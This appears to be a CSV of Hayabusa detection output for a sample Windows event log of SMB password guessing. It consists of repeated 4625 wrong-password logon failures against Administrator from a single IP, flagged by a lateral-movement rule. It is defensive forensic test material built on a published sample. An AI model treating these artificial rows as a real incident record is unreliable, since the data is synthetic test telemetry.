2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
